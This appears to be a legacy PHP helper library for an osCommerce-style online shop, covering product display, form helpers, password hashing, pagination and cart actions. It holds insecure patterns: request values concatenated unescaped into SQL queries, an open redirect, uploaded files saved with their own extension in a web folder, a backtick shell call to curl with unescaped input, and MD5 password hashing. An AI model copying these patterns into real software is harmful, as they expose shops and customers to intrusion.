function shop_create_random_value($length, $type = 'mixed') {
	if ( ($type != 'mixed') && ($type != 'chars') && ($type != 'digits')) return false;

	$rand_value = '';
	mt_srand((double) microtime() * 1000000);
	while (strlen($rand_value)<$length) {
		if ($type == 'digits') {
			$char = mt_rand(0,9);
		} else {
			$char = chr(mt_rand(0,255));
		}
		if ($type == 'mixed') {
			$do_not_use = array('O','0','l','I','1');
			if (eregi('^[a-z0-9]$', $char) && !in_array($char, $do_not_use))
				$rand_value .= $char;
		} elseif ($type == 'chars') {
			if (eregi('^[a-z]$', $char)) $rand_value .= $char;
		} elseif ($type == 'digits') {
			if (ereg('^[0-9]$', $char)) $rand_value .= $char;
		}
	}

	return $rand_value;
}

function shop_display_product($product, $mode = 'thumbnails', $complete = true) {
  if (!$complete) {
    $languages_id = $_SESSION['languages_id'];
    $products_fields = PRODUCT_DB_INFO;
    
    $listing_sql = "select $products_fields, pd.products_name, s.specials_new_products_price 
					from products p, products_description pd left join " . DB_PREFIX . "specials s on (s.products_id = pd.products_id) 
					where p.products_id = '" . $product['products_id'] . "' and pd.products_id = p.products_id and pd.language_id = '$languages_id'";

	$product = shop_db_fetch_array(shop_db_query($listing_sql));
  }

  $tax_rate = shop_get_tax_rate($product['products_tax_class_id']);
  
  if ($product['products_call_for_price'] == '1') {
  	$price = '<span class="call_for_price">' . TEXT_CALL_FOR_PRICE . '</span>';
  }
  elseif ($product['specials_new_products_price']) {
	$price = '<s>' . $GLOBALS['currencies']->display_price($product['products_price'], $tax_rate) . '</s> &nbsp;';
	$price .= '<span class="productSpecialPrice">' . $GLOBALS['currencies']->display_price($product['specials_new_products_price'], $tax_rate) . '</span>';
  }
  else {
	$price = $GLOBALS['currencies']->display_price($product['products_price'], $tax_rate);
  }


	$link = (MOD_REWRITE == 'false') ? shop_href_link('product_info.php', 'products_id=' . $product['products_id']) : shop_rewrite_link('prod', $product['products_name'], $product['products_id']);
	$link = '<a href="' . $link . (($complete) ? '&cPath=' . $_GET['cPath'] : '') . '">';

  return (($product['products_thumb'] || $product['products_image']) ? $link . shop_image('images/' . (($product['products_thumb'] && $mode == 'thumbnails') ? $product['products_thumb'] : $product['products_image']), $product['products_name'], SMALL_IMAGE_WIDTH, SMALL_IMAGE_HEIGHT) . '</a><br />' : '<h3>No Image Available</h3>').
					((PRODUCT_LIST_NAME == 'true' && $product['products_name']) ? $link . $product['products_name'] . '</a><br />' : '') .
					((PRODUCT_LIST_MANUFACTURER == 'true' && $product['manufacturers_id']) ? $link . shop_get_manufacturers_name($product['manufacturers_id']) . '</a><br />' : '') .
					((PRODUCT_LIST_MODEL == 'true' && $product['products_model']) ? $link . $product['products_model'] . '</a><br />' : '') .
					((PRODUCT_LIST_PRICE == 'true') ? $link . $price . '</a>' : '');
}

function shop_display_tax_value($value, $padding = TAX_DECIMAL_PLACES) {
	if (strpos($value, '.')) {
		$loop = true;
		while ($loop) {
			if (substr($value, -1) == '0') {
				$value = substr($value, 0, -1);
			} else {
				$loop = false;
				if (substr($value, -1) == '.') {
					$value = substr($value, 0, -1);
				}
			}
		}
	}

	if ($padding) {
		if ($decimal_pos = strpos($value, '.')) {
			$decimals = strlen(substr($value, ($decimal_pos+1)));
			for ($i=$decimals; $i<$padding; $i++) {
				$value .= '0';
			}
		} else {
			$value .= '.';
			for ($i=0; $i<$padding; $i++) {
				$value .= '0';
			}
		}
	}

	return $value;
}

function shop_href_link($page = MYSELF, $parameters = '', $connection = 'NONSSL') {
	if ($connection == 'SSL' && SECURE_SERVER_ADDRESS) {
		$link = SECURE_SERVER_ADDRESS;
	} elseif ($connection == 'NONSSL' && WEB_SERVER_ADDRESS) {
		$link = WEB_SERVER_ADDRESS;
	} else {
		$link = DIR_WS_CATALOG;
	}
	
	$session_id = ((DIR_WS_CATALOG == $link) ? '' : (SESSION_SID . '&'));

	$link .= $page . '?';
	if ($session_id) $link .= $session_id;
	if ($parameters) $link .= $parameters;

	if (substr($link,-1) == '?' || substr($link,-1) == '&') $link = substr($link,0,-1);

	return $link;
}

function shop_rewrite_link($type, $keywords, $id, $connection = 'NONSSL') {
	if ($connection == 'SSL' && SECURE_SERVER_ADDRESS) {
		$link = SECURE_SERVER_ADDRESS;
	} elseif ($connection == 'NONSSL' && WEB_SERVER_ADDRESS) {
		$link = WEB_SERVER_ADDRESS;
	} else {
		$link = DIR_WS_CATALOG;
	}
	$keywords = str_replace('--','-', @preg_replace('/[^a-z0-9.-]/','', strtolower(str_replace(array(' ','/'),'-',$keywords))));

	$session_id = ((DIR_WS_CATALOG == $link) ? '' : (SESSION_SID . '&'));

	$link .= $type . '-' . $keywords . '/' . $id . '/';
	if ($session_id) $link .= $session_id;
	
	if (substr($link,-1) == '?' || substr($link,-1) == '&') $link = substr($link,0,-1);

	return $link;
}

function shop_image($src, $alt = false, $width = false, $height = false, $params = false, $scale = true) {
	if (!file_exists($src)) return false;

	if (CONFIG_CALCULATE_IMAGE_SIZE == 'true' && $width || $height) {
		if ($image_size = @getimagesize($src)) {
			if (!$width && $height) {
				$ratio = $height / $image_size[1];
				$width = $image_size[0] * $ratio;
			} elseif ($width && !$height) {
				$ratio = $width / $image_size[0];
				$height = $image_size[1] * $ratio;
			} elseif (!$width && !$height) {
				$width = $image_size[0];
				$height = $image_size[1];
			}
		}
	}

	if (ENABLE_GD == 'true' && $scale) {
		$image = ' src="contents/image_scale.php?image=' . $src;
		if ($width) $image .= '&width=' . floor($width);
		if ($height) $image .= '&height=' . floor($height);
		$image .= '"';
	} else {
		$image = ' src="' . $src . '"';
	}
	if ($alt) $image .= ' alt="' . utf_htmlentities($alt) . '"';
	if ($width) $image .= ' width="' . preg_replace("/([0-9]+)\.[0-9]+/e", "''.floor($1).''", $width) . '"';
	if ($height) $image .= ' height="' . preg_replace("/([0-9]+)\.[0-9]+/e", "''.floor($1).''", $height) . '"';
	if ($params) $image .= ' ' . $params;

	return '<img' . $image . ' border="0">';
}

function shop_image_submit($image, $alt) {
	$image_submit = '<input type="image" src="' . DIR_WS_IMAGES . MODULE_THEME_SELECTED . DIRECTORY_SEPARATOR . $_SESSION['language'] . DIRECTORY_SEPARATOR . $image . '" border="0" alt="' . utf_htmlentities($alt) . '">';

	return $image_submit;
}

function shop_image_button($image, $alt = false, $params = false) {
	return shop_image((DIR_WS_IMAGES . MODULE_THEME_SELECTED . DIRECTORY_SEPARATOR . $_SESSION['language'] . DIRECTORY_SEPARATOR . $image), $alt, '', '', $params, false);
}

function shop_draw_separator($image = 'pixel_black.gif', $width = '100%', $height = '1') {
	return shop_image((DIR_WS_IMAGES . $image), '', $width, $height, '', false);
}

function shop_get_country_list($name, $selected = false, $javascript = false, $size = false) {
	$result = '<select name="' . $name . '"';

	if ($size) $result .= ' size="' . $size . '"';

	if ($javascript) $result .= ' ' . $javascript;

	$result .= '><option value="">' . PULL_DOWN_DEFAULT . '</option>';

	$countries = shop_get_countries();

	for ($i=0; $i<sizeof($countries); $i++) {
		$countryname = $countries[$i]['countries_name'];
		if (strlen($countryname) > 30) $countryname = substr($countryname,0,30) . '...';
		$result .= '<option value="' . $countries[$i]['countries_id'] . '"';
		if ($selected == $countries[$i]['countries_id']) $result .= ' selected="true"';
		if (!$selected && STORE_COUNTRY_ID == $countries[$i]['countries_id']) $result .= ' selected="true"';
		$result .= '>' . $countryname . '</option>';
		}
	$result .= '</select>';

	return $result;
}

function shop_draw_form($name, $action, $parameters = '', $method = 'post', $params = '', $charset = 'utf-8') {
  $form = '<form name="' . $name . '" id="' . $name . '" action="' . $action . (($parameters) ? '?' . $parameters : '') . '" method="' . $method . '"' . (($charset) ? ' accept-charset="' . $charset . '"' : '');
  if ($params) $form .= ' ' . $params;
  $form .= '>' . shop_draw_hidden_field(session_name(),session_id());
	
  return $form;
}

function shop_draw_input_field($name, $value = false, $parameters = false, $type = 'text', $reinsert_value = true) {
	$field = '<input type="' . $type . '" name="' . $name . '"';
	if (!$value && (@$GLOBALS[$name])) {
		$field .= ' value="' . utf_htmlentities(stripslashes($GLOBALS[$name])) . '"';
	} elseif ($value) {
		$field .= ' value="' . trim(htmlspecialchars($value)) . '"';
	}
	if ($parameters) {
		$field .= ' ' . $parameters;
	}
	$field .= ' />';

	return $field;
}

function shop_draw_password_field($name, $value = false) {
	$field = shop_draw_input_field($name, $value, 'maxlength="40"', 'password', false);

	return $field;
}

function shop_draw_selection_field( $name, $type, $value=false, $checked=false, $params='' ) {
	$selection = '<input type="' . $type . '" name="' . $name . '"';
  if ($value)	$selection .= ' value="' . trim(htmlentities($value)) . '"';
  if ($checked == true || $GLOBALS[$name] == 'on' || $GLOBALS[$name] == 'true')
		$selection .= ' checked="true"';
	if ($params) $selection .= ' ' . $params;
  $selection .= ' />';
  return $selection;
}

function shop_draw_checkbox_field($name, $value = false, $checked = false) {
	return shop_draw_selection_field($name, 'checkbox', $value, $checked);
}

function shop_draw_radio_field($name, $value = false, $checked = false, $params = '') {
	return shop_draw_selection_field($name, 'radio', $value, $checked, $params);
}

function shop_draw_textarea_field($name, $wrap, $width, $height, $text = false, $reinsert_value = true) {
	$field = '<textarea name="' . $name . '" wrap="' . $wrap . '" cols="' . $width . '" rows="' . $height . '">';
	if (@$GLOBALS[$name] && !$text) {
		$field .= utf_htmlentities(stripslashes($GLOBALS[$name]));
	} elseif ($text) {
		$field .= trim(htmlspecialchars($text));
	}
	$field .= '</textarea>';

	return $field;
}

function shop_draw_hidden_field($name, $value = false) {
	$field = '<input type="hidden" name="' . $name . '" value="';
	if ($value) {
		$field .= trim(htmlspecialchars($value));
	} elseif (@$GLOBALS[$name]) {
		$field .= utf_htmlentities(stripslashes($GLOBALS[$name]));
	}
	$field .= '" />';

	return $field;
}

function shop_draw_pull_down_menu($name, $values, $default = false, $parameters = false) {
	$field = '<select name="' . $name . '"';
	if ($parameters) $field .= ' ' . $parameters;
	$field .= '>';
	for ($i=0; $i<sizeof($values); $i++) {
		$field .= '<option value="' . $values[$i]['id'] . '"';
		if ( (@$GLOBALS[$name] == $values[$i]['id']) || ($default == $values[$i]['id']) ) {
			$field .= ' selected="selected"';
		}
		$field .= '>' . $values[$i]['text'] . '</option>';
	}
	$field .= '</select>';
	return $field;
}

class languages {
	var $languages;

	function languages() {
		$this->languages = array();
		$languages_query = shop_db_query("select languages_id as id, name, code, image from " . DB_PREFIX . "languages order by name");
		while ($languages = shop_db_fetch_array($languages_query)) {
			$this->languages[$languages['code']] = $languages;
		}
		$GLOBALS['catalog_languages'] = $this->languages;
	}

	function exists($language) {
		return (sizeof($this->languages[$language]));
	}
}

class affiliates {
	var $affiliates;

	function affiliates($language) {
		$this->affiliates = array();
		$affiliates_query = shop_db_query("select a.*, a.email, afd.introduction, c.continent, c.countries_iso_code_2, z.zone_name, z.zone_code
													from " . DB_PREFIX . "affiliates a, " . DB_PREFIX . "affiliates_description afd, " . DB_PREFIX . "countries c, " . DB_PREFIX . "zones z
													where afd.affiliates_description_id = a.introduction_id 
													and afd.language_id = '$language'
													and c.countries_id = a.country
													and z.zone_country_id = a.country
													and z.zone_id = a.zone");
		while ($affiliates = shop_db_fetch_array($affiliates_query)) {
			$this->affiliates[$affiliates['link_code']] = $affiliates;
		}
	}

	function exists($affiliate) {
		return (sizeof($this->affiliates[$affiliate]));
	}

	function configure($affiliate) {  
		switch ($this->affiliates[$affiliate]['continent']) {
			case 1:
				$this->affiliates[$affiliate]['continent'] = 'africa';
				break;
			case 2:
				$this->affiliates[$affiliate]['continent'] = 'asia';
				break;
			case 3:
				$this->affiliates[$affiliate]['continent'] = 'europe';
				break;
			case 4:
				$this->affiliates[$affiliate]['continent'] = 'namerica';
				break;
			case 5:
				$this->affiliates[$affiliate]['continent'] = 'oceania';
				break;
			case 6:
				$this->affiliates[$affiliate]['continent'] = 'samerica';
				break;
			default:
				$this->affiliates[$affiliate]['continent'] = 'other';
				break;
		}
		define('STORE_NAME', $this->affiliates[$affiliate]['name']);
		define('AFFILIATE', $this->affiliates[$affiliate]['link_code']);
		define('STORE_OWNER', $this->affiliates[$affiliate]['owner']);
		define('STORE_NAME_ADDRESS', $this->affiliates[$affiliate]['address_phone']);
		define('STORE_COUNTRY_CODE', $this->affiliates[$affiliate]['countries_iso_code_2']);
		define('STORE_COUNTRY_ID', $this->affiliates[$affiliate]['country']);
		define('STORE_CONTINENT', $this->affiliates[$affiliate]['continent']);
		define('STORE_ZONE_ID', $this->affiliates[$affiliate]['zone']);
		define('STORE_STATE', $this->affiliates[$affiliate]['zone_name']);
		define('STORE_ST', $this->affiliates[$affiliate]['zone_code']);
		define('STORE_ORIGIN_ZIP', $this->affiliates[$affiliate]['postal']);
		define('STORE_OWNER_EMAIL_ADDRESS', $this->affiliates[$affiliate]['email']);
		define('INTRODUCTION', $this->affiliates[$affiliate]['introduction']);
		define('STORE_ORIGIN_COUNTRY', $this->affiliates[$affiliate]['countries_iso_code_2']);
		define('TITLE', STORE_NAME);
		define('STORE_LOGO', $this->affiliates[$affiliate]['image']);
		return true;
	}
}

function validate_password($plain_pass, $db_pass){
	if($plain_pass == $db_pass) return true;
	if(!($subbits = split(":", $db_pass, 2))) return false;
	return $subbits[0] == md5($subbits[1] . $plain_pass);
}

function crypt_password($plain_pass){
	mt_srand ((double) microtime() * 1000000);
	$salt = substr(md5(mt_rand()),0, 2);
	$passtring = $salt . $plain_pass;
	return (md5($passtring) . ":" . $salt);
}

function shop_validate_email($email) {
  return eregi("^[_\.0-9a-zA-Z-]+@([0-9a-zA-Z-]+\.)+[a-zA-Z]{2,6}$", $email);
}

class splitPageResults {

  function splitPageResults(&$current_page_number, $max_rows_per_page, &$sql_query, &$query_num_rows) {
	if (empty($current_page_number)) $current_page_number = 1;
	$query_num_rows = shop_db_num_rows(shop_db_query($sql_query));
	$sql_query .= " limit " . ($max_rows_per_page * ($current_page_number - 1)) . ", " . $max_rows_per_page;
  }

  function display_links($query_numrows, $max_rows_per_page, $max_page_links, $current_page_number, $parameters = false, $page_name = 'page') {
	if ($parameters) $parameters .= '&';
	$num_pages = intval($query_numrows / $max_rows_per_page);
	if ($query_numrows % $max_rows_per_page) $num_pages++;

	$pages_array = array();
	$prevnext_array = array();
	for ($i=1; $i<=$num_pages; $i++) {
			$pages_array[] = array('id' => $i, 'text' => $i);
	}

	$prevnext_links = '';
	$previous = '';
	$next = '';
	if (@$pages_array[$_GET['page']-2]['text']) $previous = $pages_array[$_GET['page']-2]['text'];
	if (@$pages_array[$_GET['page']]['text']) $next = $pages_array[$_GET['page']]['text'];
	if ($num_pages > 1) {
			$display_links = TEXT_RESULT_PAGE . shop_draw_form('pages', MYSELF, '', 'get');
			$display_links_pages = '';
			if ($parameters) {
				 if (substr($parameters, -1) == '&') $parameters = substr($parameters, 0, -1);
				 $pairs = split('[\&=]', $parameters);
				 for ($p=0; $p < sizeof($pairs); $p++) {
				 	if (@$pairs[$p]) {
						$prevnext_links .= rawurldecode($pairs[$p]) . '=' . rawurldecode($pairs[$p+1]) . '&';
						$display_links_pages .= shop_draw_hidden_field(rawurldecode($pairs[$p]), rawurldecode($pairs[$p+1]));
					}
					$p++;
				 }
			}
			if ($previous) $display_links .= '<a href="' . MYSELF . '?' . $prevnext_links . 'page=' . $previous . '"><img src="images/arrow_left.gif" border="0" width="7" height="7" /></a>';
			$display_links .= shop_draw_pull_down_menu($page_name, $pages_array, $_GET['page'], 'onChange="this.form.submit();"');
			$display_links .= $display_links_pages;
			if ($next) $display_links .= '<a href="' . MYSELF . '?' . $prevnext_links . 'page=' . $next . '"><img src="images/arrow_right.gif" border="0" width="7" height="7" /></a>';
			
			$display_links .= '</form>';
	} else {
			$display_links = '';
	}

	return $display_links;
  }

  function display_count($query_numrows, $max_rows_per_page, $current_page_number, $text_output) {
	$to_num = ($max_rows_per_page * $current_page_number);
	if ($to_num > $query_numrows) $to_num = $query_numrows;
	$from_num = ($max_rows_per_page * ($current_page_number - 1));
	if ($to_num) $from_num++;
	return sprintf($text_output, $from_num, $to_num, $query_numrows);
  }
}

class tableBox {
	var $table_border = '0';
	var $table_width = '100%';
	var $table_cellspacing = '0';
	var $table_cellpadding = '4';
	var $table_parameters = '';
	var $table_row_parameters = '';
	var $table_data_parameters = '';

	function tableBox($contents, $direct_output = false) {
		$tableBox_string = '<table border="' . $this->table_border . '" width="' . $this->table_width . '" cellspacing="' . $this->table_cellspacing . '" cellpadding="' . $this->table_cellpadding . '"';
		if ($this->table_parameters != '') $tableBox_string .= ' ' . $this->table_parameters;
		$tableBox_string .= '>' . UNIX_RETURN;

		for ($i=0; $i<sizeof($contents); $i++) {
			if (@$contents[$i]['form']) $tableBox_string .= $contents[$i]['form'] . UNIX_RETURN;
			$tableBox_string .= '  <tr';
			if (@$this->table_row_parameters != '') $tableBox_string .= ' ' . $this->table_row_parameters;
			if (@$contents[$i]['params']) $tableBox_string .= ' ' . $contents[$i]['params'];
			$tableBox_string .= '>' . UNIX_RETURN;

			if (is_array(@$contents[$i][0])) {
				for ($x=0; $x<sizeof($contents[$i]); $x++) {
					if (@$contents[$i][$x]['text']) {
						$tableBox_string .= '    <td';
						if (@$contents[$i][$x]['align'] != '') $tableBox_string .= ' align="' . $contents[$i][$x]['align'] . '"';
						if (@$contents[$i][$x]['params']) {
							$tableBox_string .= ' ' . $contents[$i][$x]['params'];
						} elseif ($this->table_data_parameters != '') {
							$tableBox_string .= ' ' . $this->table_data_parameters;
						}
						$tableBox_string .= '>';
						if (@$contents[$i][$x]['form']) $tableBox_string .= $contents[$i][$x]['form'];
						$tableBox_string .= $contents[$i][$x]['text'];
						if (@$contents[$i][$x]['form']) $tableBox_string .= '</form>';
						$tableBox_string .= '</td>' . UNIX_RETURN;
					}
				}
			} else {
				$tableBox_string .= '    <td';
				if (@$contents[$i]['align'] != '') $tableBox_string .= ' align="' . $contents[$i]['align'] . '"';
				if (@$contents[$i]['params']) {
					$tableBox_string .= ' ' . $contents[$i]['params'];
				} elseif (@$this->table_data_parameters != '') {
					$tableBox_string .= ' ' . $this->table_data_parameters;
				}
				$tableBox_string .= '>' . $contents[$i]['text'] . '</td>' . UNIX_RETURN;
			}

			$tableBox_string .= '  </tr>' . UNIX_RETURN;
			if (@$contents[$i]['form']) $tableBox_string .= '</form>' . UNIX_RETURN;
		}

		$tableBox_string .= '</table>' . UNIX_RETURN;

		if (@$direct_output) echo $tableBox_string;

		return $tableBox_string;
	}
}

class contentBox extends tableBox {
	function contentBox($contents) {
		$info_box_contents = array();
		$info_box_contents[] = array('text' => $this->contentBoxContents($contents));
		$this->table_cellpadding = '0';
		$this->table_parameters = 'class="navbar"';
		$this->tableBox($info_box_contents, true);
	}

	function contentBoxContents($contents) {
		$this->table_cellpadding = '4';
		$this->table_parameters = 'class="navbar" ';
		return $this->tableBox($contents);
	}
}

class contentBoxHeading extends tableBox {
	function contentBoxHeading($contents) {
		$this->table_width = '100%';
		$this->table_cellpadding = '0';

		$info_box_contents = array();
		$info_box_contents[] = array('params' => 'height="17" class="navbar" align="center" width="100%"', 'text' => $contents[0]['text']);
		$this->tableBox($info_box_contents, true);
	}
}

function shop_get_orders_status($orders_status_id) {
	$result = shop_db_query("select status_id as id, status_name as text from " . DB_PREFIX . "orders_status_values where language_id = '" . $_SESSION['languages_id'] . "' order by sort_order asc");
	$orders_statuses = array();
	while ($row = shop_db_fetch_array($result)) {
		$orders_statuses[] = $row;
		$in_order[$row['id']] = $row;
	}
	
  if ($orders_status_id) {
  	return $in_order[$orders_status_id]['text'];
  } else {
  	return $orders_statuses;
  }
}

function shop_set_specials_status($specials_id, $status) {
	return shop_db_query("update " . DB_PREFIX . "specials set status = '$status', date_status_change = now() where specials_id = '$specials_id'");
}

function shop_expire_specials() {
	$specials_query = shop_db_query("update " . DB_PREFIX . "specials set status = '0' where status = '1' and now() >= expires_date and expires_date > 0");
	$features_query = shop_db_query("delete from " . DB_PREFIX . "features where now() >= expires_date and expires_date > 0");
}

function & http_request($address, $data_array = array()) {
	$data = '';
	foreach ($data_array as $key => $value) $data .= $key . '=' . urlencode($value) . '&';
	$data = substr($data, 0, -1);
	if (function_exists('curl_init')) {
	    $ch = @curl_init($address);
		if ($data_array) {
			curl_setopt($ch, CURLOPT_POST, 1);
			curl_setopt($ch, CURLOPT_POSTFIELDS, "$data");
		}
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_COOKIE, 0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_VERBOSE, 0);
		$response = curl_exec($ch);
		curl_close($ch);
	} else {
		$response = `/usr/bin/curl -d "$data" $address`;
	}
	return $response;
}

function shop_set_cpath() {
	global $cPath, $current_category_id;
	if (@$_GET['cPath']) {
		$cPath = $_GET['cPath'];
	} elseif (@$_GET['products_id'] && !@$_GET['manufacturers_id']) {
		$cPath = shop_get_product_path($_GET['products_id']);
	} else {
		$cPath = '';
	}
	if ($cPath) {
		$cPath_array = explode('_', $cPath);
		$current_category_id = $cPath_array[(sizeof($cPath_array)-1)];
	} else {
		$current_category_id = 0;
	}
	return true;
}

function shop_process_action() {
	if (DISPLAY_CART == 'true') {
		$goto = 'shopping_cart.php';
		$parameters = array('action', 'cPath', 'products_id', 'pid');
	} else {
		$goto = MYSELF;
		if (@$_GET['action'] == 'buy_now') {
			$parameters = array('action', 'pid', 'products_id');
		} else {
			$parameters = array('action', 'pid');
		}
	}

	switch ($_GET['action']) {
		case 'update_product':
			for ($i=0; $i<sizeof($_POST['products_id']);$i++) {
				// Check whether to delete this product from the cart
				if (@$_POST['cart_delete'][$i]>=1 OR $_POST['cart_quantity'][$i]<=0) {
					$_SESSION['cart']->remove($_POST['products_id'][$i]);
				} else {
					$attributes = ($_POST['attributes'][$_POST['products_id'][$i]]) ? $_POST['attributes'][$_POST['products_id'][$i]] : '';
					$customer_options = ($_POST['customer_options'][$_POST['products_id'][$i]]) ? $_POST['customer_options'][$_POST['products_id'][$i]] : '';
	
					// Check minimum quantity
					$quantity = (@$_POST['products_min_qty'][$i] > $_POST['cart_quantity'][$i])
						? $_POST['products_min_qty'][$i]
						: $_POST['cart_quantity'][$i];
					$_SESSION['cart']->add_cart($_POST['products_id'][$i], $quantity, $attributes, $customer_options);
				}
			}
			shop_redirect(shop_href_link($goto, shop_get_all_get_params($parameters), 'NONSSL'));
			break;

		case 'add_product':
			if (@$_POST['products_qty']) {
				$quantity = $_POST['products_qty'];
			} else {
				$quantity = 1;
			}
			$quantity = (@$_POST['products_min_qty'] > $_SESSION['cart']->get_quantity($_POST['products_id']) + $quantity)
				? $_POST['products_min_qty'] : $quantity;

			if (is_array(@$_FILES['customer_options'])) {
				while (list($key,$value) = each($_FILES['customer_options']['name'])) {
				$tmpname = $_FILES['customer_options']['tmp_name'][$key];
				$extension = explode('.',$value);
				if ($value) {
					$new_file = './customer_options/' . basename($tmpname) . '.' . $extension[1];
					move_uploaded_file($tmpname, $new_file);
					@chmod($new_file, 0755);
					$_POST['customer_options'][$key] = basename($tmpname) . '.' . $extension[1];
				}
				}
			} 

			if (ereg('^[0-9]+$', $_POST['products_id'])) {
				$_SESSION['cart']->add_cart($_POST['products_id'], $_SESSION['cart']->get_quantity($_POST['products_id'])+$quantity, $_POST['attributes'], $_POST['customer_options']);
			}
			if (@$_GET['products_name']) {
				$product_info = shop_db_query("select products_id from " . DB_PREFIX . "products_description where products_name = '" . $_GET['products_name'] . "' and language_id = '" . $_SESSION['languages_id'] . "'");
				$product_info_values = shop_db_fetch_array($product_info);
				$_SESSION['cart']->add_cart($product_info_values['products_id'], $_SESSION['cart']->get_quantity($product_info_values['products_id'])+$quantity, $_POST['attributes'], $_POST['customer_options']);
			}
			if (@$_GET['products_model']) {
				$product_info = shop_db_query("select products_id from " . DB_PREFIX . "products where products_model = '" . $_GET['products_model'] . "'");
				$product_info_values = shop_db_fetch_array($product_info);
				$_SESSION['cart']->add_cart($product_info_values['products_id'], $_SESSION['cart']->get_quantity($product_info_values['products_id'])+$quantity, $_POST['attributes'], $_POST['customer_options']);
			}
			$_GET['cart_add'] = $_POST['products_id'];
			if ($_POST['attributes']) {
				foreach ($_POST['attributes'] as $key => $value) {
					$_GET['cart_add'] .= '{' . $key . '}' . $value;
				}
			}
			if ($_POST['customer_options']) {
				foreach ($_POST['customer_options'] as $key => $value) {
					$_GET['cart_add'] .= '{' . $key . '}' . substr($value,0,4);
				}
			}
			shop_redirect(shop_href_link($goto, shop_get_all_get_params($parameters), 'NONSSL'));
			break;

		case 'add_multiproduct':
			foreach($_POST['products_id'] as $product_id=>$quantity) {
				if ($quantity > '0') {
					// Check minimum quantity
					$quantity = (@$_POST['products_qty'][$product_id] > $_SESSION['cart']->get_quantity($product_id) + $quantity)
						? $_POST['products_qty'][$product_id] : $quantity;
					$_SESSION['cart']->add_cart($product_id, $_SESSION['cart']->get_quantity($product_id)+$quantity);
				}
			}
			shop_redirect(shop_href_link($goto, shop_get_all_get_params($parameters), 'NONSSL'));
			break;

		case 'buy_now':
			if (shop_has_product_attributes($_GET['products_id'])) {
				shop_redirect(shop_href_link('product_info.php', 'products_id=' . $_GET['products_id'], 'NONSSL'));
			} else {
				$_SESSION['cart']->add_cart($_GET['products_id'], $_SESSION['cart']->get_quantity($_GET['products_id'])+1);
				shop_redirect(shop_href_link($goto, shop_get_all_get_params($parameters), 'NONSSL'));
			}
			break;

		case 'cust_order':
			if ($_SESSION['customer_id']) {
				if (shop_has_product_attributes($_GET['pid'])) {
					shop_redirect(shop_href_link('product_info.php', 'products_id=' . $_GET['pid'], 'NONSSL'));
				} else {
					$_SESSION['cart']->add_cart($_GET['pid'], 1);
				}
			}
			shop_redirect(shop_href_link($goto, shop_get_all_get_params($parameters), 'NONSSL'));
			break;

		case 'url':
			if (@$_GET['goto']) {
				shop_redirect($_GET['goto']);
			} else {
				shop_redirect(shop_href_link('index.php', '', 'NONSSL'));
			}
			break;

		case 'manufacturer':
			if (@$_GET['manufacturers_id']) {
				$manufacturer_query = shop_db_query("select manufacturers_url from " . DB_PREFIX . "manufacturers where manufacturers_id = '" . $_GET['manufacturers_id'] . "'");
				$manufacturer = shop_db_fetch_array($manufacturer_query);
				shop_redirect($manufacturer['manufacturers_url']);
			} else {
				shop_redirect(shop_href_link('index.php', '', 'NONSSL'));
			}
			break;
	}
	return true;
}

class sparx {
	var $files, $sparx_classes;

	function shop_load_sparx() {
		$module_directory = 'contents/sparx/';
		$file_extension = substr(PHP_SELF, strrpos(PHP_SELF, '.'));
		$directory_array = array();
		$exists = false;
		if ($dir = @dir($module_directory)) {
			while ($file = $dir->read()) {
				if (!is_dir($module_directory . $file)) {
					if (substr($file, strrpos($file, '.')) == $file_extension) {
						$directory_array[] = $file;
						$exists = true;
					}
				}
			}
			sort($directory_array);
			$dir->close();
		}
		
		if ($exists) {
			$this->files = $directory_array;
			foreach ($this->files as $value) {
				include('contents/sparx/' . $value);
				$class = substr($value, 0, strrpos($value, '.'));
				$this->sparx_classes[] = $class;
				$GLOBALS[$class] = new $class;
				$GLOBALS[$class]->load();
			}
		}
		return true;
	}
}
